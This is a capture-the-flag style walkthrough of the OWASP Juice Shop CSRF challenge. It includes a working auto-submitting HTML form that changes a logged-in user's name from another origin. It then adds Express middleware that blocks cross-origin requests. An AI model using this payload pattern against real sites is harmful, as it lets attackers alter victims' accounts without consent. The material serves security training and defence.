
CSRF

Difficulty: 🌟🌟🌟

Description: Change the name of a user by performing Cross-Site Request Forgery from another origin.

Category: Broken Access Control

Tags:

Solution:

Tested on:

NOTE: Newer Firefox versions can't perform this attack❗.

NOTE: Firefox version 60.0.2 won't display the modal or navigation bar normally, so I suggest you navigate between pages using the URL.

First, log in to the user account and navigate to the route localhost:3000/profile:

login

Then open http://htmledit.squarefree.com/ as a new tab:

NOTE: Open with http as intended.

live HTML editor

Then paste the code below into the live HTML editor:

<form action="http://localhost:3000/profile" method="POST">
<input name="username" value="DuckyMomo20012"/>
<input type="submit"/>
</form>
<script>document.forms[0].submit();</script>

The attack will be performed immediately:

CSRF attack

Then reload the profile page to see the change:

result
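
The forged form above works because the browser attaches the logged-in user's session to a POST that another page triggered. One server-side defense is to refuse state-changing requests whose origin cannot be shown to be the application itself. The middleware below is an added example, not Juice Shop code; `TRUSTED_ORIGINS`, `sourceOrigin`, `isForged` and `rejectCrossOrigin` are hypothetical names, and the sample requests are constructed.

```javascript
// Added example (not Juice Shop code): Express-style middleware that rejects
// cross-origin state-changing requests such as the auto-submitted form above.
// TRUSTED_ORIGINS is an assumption; list the origins your app is served from.
const TRUSTED_ORIGINS = new Set(['http://localhost:3000']);
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);

// Return the origin the browser reports for the request, or null if unknown.
function sourceOrigin(headers) {
  if (headers.origin !== undefined) {
    // Browsers send the literal string "null" for opaque origins.
    return headers.origin === 'null' ? null : headers.origin;
  }
  if (headers.referer) {
    try {
      return new URL(headers.referer).origin;
    } catch {
      return null; // malformed Referer header
    }
  }
  return null;
}

function isForged(req) {
  if (SAFE_METHODS.has(req.method)) return false;
  // Fetch Metadata: modern browsers label cross-site requests explicitly.
  const site = req.headers['sec-fetch-site'];
  if (site && site !== 'same-origin' && site !== 'none') return true;
  const origin = sourceOrigin(req.headers);
  // Fail closed: a state-changing request with no provable origin is refused.
  return origin === null || !TRUSTED_ORIGINS.has(origin);
}

function rejectCrossOrigin(req, res, next) {
  if (isForged(req)) {
    res.statusCode = 403;
    return res.end('Cross-origin request rejected');
  }
  next();
}

// Constructed requests: the form submitted from the HTML editor tab, and the
// same update sent from the application's own profile page.
const forgedRequest = { method: 'POST', headers: { origin: 'http://htmledit.squarefree.com' } };
const ownRequest = { method: 'POST', headers: { origin: 'http://localhost:3000' } };
console.log(isForged(forgedRequest), isForged(ownRequest));
```

An origin check like this complements, rather than replaces, per-session anti-CSRF tokens and `SameSite` cookie attributes.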